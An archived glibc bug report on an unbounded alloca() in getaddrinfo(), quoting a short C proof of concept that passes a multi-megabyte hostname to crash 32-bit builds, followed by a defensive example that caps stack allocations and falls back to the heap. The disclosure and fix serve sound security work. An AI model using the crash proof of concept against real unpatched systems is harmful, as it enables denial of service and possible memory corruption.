This is the mail archive of the
glibc-bugs@sourceware.org
mailing list for the glibc project.
[Bug libc/11884] Unbounded alloca() in node parameter of getaddrinfo()
- From: "cdn at chromium dot org" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sources dot redhat dot com
- Date: 5 Aug 2010 05:14:15 -0000
- Subject: [Bug libc/11884] Unbounded alloca() in node parameter of getaddrinfo()
- References: <20100805051208.11884.cdn@chromium.org>
- Reply-to: sourceware-bugzilla at sourceware dot org
------- Additional Comments From cdn at chromium dot org 2010-08-05 05:14 -------
getaddra() should be getaddrinfo()... that's what I get for not proofreading.
(In reply to comment #0)
> getaddra() uses the provided node parameter to determine the size of an
> alloca(). When compiled without the -fstack-check option alloca() will be
> inlined as "SUB esp, size". For large values of size this can result in
> several consequences which allow subsequent writes to the stack to overwrite
> arbitrary memory.
>
> The following POC can be used to demonstrate this vulnerability.
>
> #include <stdlib.h>      /* atoi, exit */
> #include <string.h>      /* memset */
> #include <sys/mman.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netdb.h>
>
> int main(int argc, char **argv) {
>     struct addrinfo hints, *res;
>     char *host;
>     /* Build a node string of the length given in argv[1]; its length drives
>        the size of the alloca() inside getaddrinfo(). */
>     host = mmap(0, atoi(argv[1]), PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
>     memset(host, 0x41, atoi(argv[1]));
>     host[atoi(argv[1]) - 1] = '\0';
>     memset((char *)&hints, 0, sizeof(hints));
>     hints.ai_family = PF_INET;
>     hints.ai_socktype = SOCK_STREAM;
>     getaddrinfo(host, 0, &hints, &res);
>     exit(0);
> }
>
> On a 32bit arch try values in the range of 9mb to demonstrate a crash.
--
http://sourceware.org/bugzilla/show_bug.cgi?id=11884
------- You are receiving this mail because: -------
You are on the CC list for the bug, or are watching someone who is.
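The defensive pattern for the bug discussed above is to never size a stack allocation from caller-controlled input without a cap: fall back to the heap once the request exceeds a fixed limit. The following is an added illustration written for this page, not glibc's code; `ALLOCA_LIMIT`, `scan_node` and its hostname-character check are constructed for the example.

```c
#include <alloca.h>
#include <ctype.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Constructed cap for this example: requests at or above it go to the heap,
   so the stack pointer can never be moved by an attacker-chosen amount. */
#define ALLOCA_LIMIT 4096

/* Decide whether a temporary buffer of `size` bytes may live on the stack. */
static int use_alloca(size_t size) {
    return size < ALLOCA_LIMIT;
}

/* Example work on a node name: count characters that are not valid in a
   hostname, operating on a NUL-terminated temporary copy (as a resolver
   might). The copy is bounded on the stack and unbounded only on the heap.
   *on_heap reports which path was taken. Returns -1 on allocation failure. */
long scan_node(const char *node, int *on_heap) {
    size_t len = strlen(node);
    size_t need = len + 1;
    int heap = 0;
    char *tmp;

    if (use_alloca(need)) {
        tmp = alloca(need);        /* at most ALLOCA_LIMIT - 1 bytes */
    } else {
        tmp = malloc(need);        /* large input: heap, never the stack */
        if (tmp == NULL)
            return -1;
        heap = 1;
    }
    memcpy(tmp, node, need);

    long bad = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)tmp[i];
        if (!isalnum(c) && c != '-' && c != '.')
            bad++;
    }

    if (heap)
        free(tmp);
    if (on_heap)
        *on_heap = heap;
    return bad;
}
```

A 9 MB node name, the size the report uses to crash a 32-bit build, takes the heap path here and leaves the stack untouched.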